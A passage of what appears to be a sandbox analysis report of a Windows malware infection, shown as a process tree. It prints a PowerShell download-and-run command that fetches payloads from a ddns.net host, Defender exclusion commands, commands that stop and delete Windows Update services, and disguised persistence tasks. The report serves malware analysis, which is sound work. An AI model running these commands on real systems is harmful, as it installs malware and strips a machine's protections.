cAAuAGUAeABlACcALAAgADwAIwBsAHAAcQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHkAcwBjACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAbQB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAG4AdABrACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBkAGQAbgBzAC4AbgBlAHQALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAG0AYQByAHQARABlAGYAUgB1AG4ALgBlAHgAZQAnACwAIAA8ACMAegB6AGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB5AGgAbAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBtAHgAcgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAG0AYQByAHQARABlAGYAUgB1AG4ALgBlAHgAZQAnACkAKQA8ACMAcQB4AHoAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAagB0AG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAYwBsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQA8ACMAaABxAGgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYwBnAGEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGIAawB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAG4AZQB3ADIALgBlAHgAZQAnACkAPAAjAGsAcgBwACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHYAbQByACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBhAHgAagAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAHkAcwBBAHAAcAAuAGUAeABlACcAKQA8ACMAZgBiAGIAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdABmAG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAaQB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQA8ACMAYgBwAHMAIwA+AA=="4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\new2.exe"C:\Users\Admin\AppData\Local\Temp\new2.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"6⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5004 -s 3126⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\SysApp.exe"C:\Users\Admin\AppData\Local\Temp\SysApp.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"6⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
-
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1064 -s 2363⤵
- Program crash
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nefucvtr#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#waqsnj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "WindowsDefenderSmartScreenQC" } Else { "C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe" }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn WindowsDefenderSmartScreenQC3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nefucvtr#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe ovyftblehadxh2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe dazvaqbeggbsgujt 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2⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3364 -s 3562⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s W32Time1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3276 -s 9362⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 1064 -ip 10642⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 5004 -ip 50042⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 536 -p 3364 -ip 33642⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 532 -p 3276 -ip 32762⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 552 -p 3328 -ip 33282⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 644 -p 3456 -ip 34562⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 648 -p 1816 -ip 18162⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 632 -p 4520 -ip 45202⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 624 -p 3956 -ip 39562⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 652 -p 4168 -ip 41682⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 632 -p 4748 -ip 47482⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 660 -p 224 -ip 2242⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 552 -p 1272 -ip 12722⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 648 -p 3556 -ip 35562⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 640 -p 1332 -ip 13322⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 552 -p 1312 -ip 13122⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 592 -p 2868 -ip 28682⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 564 -p 4184 -ip 41842⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 640 -p 4368 -ip 43682⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 564 -p 3408 -ip 34082⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 592 -p 5036 -ip 50362⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3328 -s 4722⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3456 -s 4202⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
